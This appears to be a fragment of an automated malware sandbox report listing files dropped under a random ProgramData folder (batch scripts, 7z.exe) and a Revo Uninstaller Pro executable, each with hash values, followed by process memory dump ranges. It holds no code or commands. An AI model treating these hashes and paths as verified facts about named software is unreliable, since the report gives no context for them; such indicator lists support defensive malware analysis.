SHA1 678d3b531738573520367b47c0cd52cf5e431fa0
SHA256 927eea7dfec57f598e6f1850aebe3c3bc8061e5690bc84ba3dc03f5b35980bae
SHA512 9c5a170f5654c4e6378092dfbd56e2a41b364dc212429efa388cb8a162bff3fda977bf0328c7515fc4ec7ef1098f65ff5f63106b76d3f36e66ce9801294cde9e

C:\ProgramData\uzlyLtM20yixSdV\main.bat

MD5 1376349b5831fe5760106870cd5bad6d
SHA1 cf6ff2d17e597893a61fedfd4fe90748ab2349e1
SHA256 67fc2976cfc997cc5d0e74a45ba3fe44c486e3f57e92a9b77cfd4d55199c1872
SHA512 64af4f7e513b6e860757293f0dd92100f17121f10d9c75c72c8ff9bea1144eda55c62be6b16a158b513828cdc3e3c5a355382062d975673617f020a5e10d99b8

C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exe

MD5 1dd8459f2595e4c0603ad491590f6952
SHA1 607efe3c74388fb1e4b19f8f7ed2520ebfc349a1
SHA256 5bd688f49ff03dd91e3e88fc6c66d495f72afa617c4363b69c29c4ca5016fc4d
SHA512 c89c0d8457800642b1b165098d9c6def13a6e56d2ad20fb13b4cf2598d278940036d34a3657a1e07cb0028240000ef3c1dcd3b9c4def0fd861aae684db60c22d

C:\ProgramData\uzlyLtM20yixSdV\delXPDUR9c.bat

MD5 308ba58a50ffa9eabd31fdba79af6dd1
SHA1 29c09164facb6419f9d7f9e103f7e13bed4743a1
SHA256 0ef02b5ebb5f59c70722fc29651ad48a49b2b4d87f33416b1b06c8a038475243
SHA512 674edfeacf8c6e606a80187f95dc16abcc0804f18c2b2e81734cf4f7e6d1f68e9db5827f18107c0882506aba47485665471c37acd2b9ad50ca075eb083a9582f

memory/1876-333-0x0000000000400000-0x0000000000E32000-memory.dmp

C:\ProgramData\uzlyLtM20yixSdV\7z.exe

MD5 619f7135621b50fd1900ff24aade1524
SHA1 6c7ea8bbd435163ae3945cbef30ef6b9872a4591
SHA256 344f076bb1211cb02eca9e5ed2c0ce59bcf74ccbc749ec611538fa14ecb9aad2
SHA512 2c7293c084d09bc2e3ae2d066dd7b331c810d9e2eeca8b236a8e87fdeb18e877b948747d3491fcaff245816507685250bd35f984c67a43b29b0ae31ecb2bd628

memory/2228-343-0x0000000000130000-0x000000000025E000-memory.dmp

memory/2228-347-0x00000000004D0000-0x00000000004EA000-memory.dmp

memory/2840-362-0x0000000000400000-0x0000000000429000-memory.dmp

memory/2336-361-0x0000000000400000-0x0000000000509000-memory.dmp

memory/2820-363-0x0000000000400000-0x0000000000E32000-memory.dmp

memory/2228-368-0x0000000005970000-0x0000000005A60000-memory.dmp

memory/2228-369-0x00000000055C0000-0x0000000005658000-memory.dmp

memory/2988-372-0x0000000000400000-0x0000000000495000-memory.dmp

memory/2988-381-0x0000000000400000-0x0000000000495000-memory.dmp

memory/2988-382-0x0000000000400000-0x0000000000495000-memory.dmp

memory/2988-380-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2988-378-0x0000000000400000-0x0000000000495000-memory.dmp

memory/2988-376-0x0000000000400000-0x0000000000495000-memory.dmp

memory/2988-374-0x0000000000400000-0x0000000000495000-memory.dmp

memory/2988-370-0x0000000000400000-0x0000000000495000-memory.dmp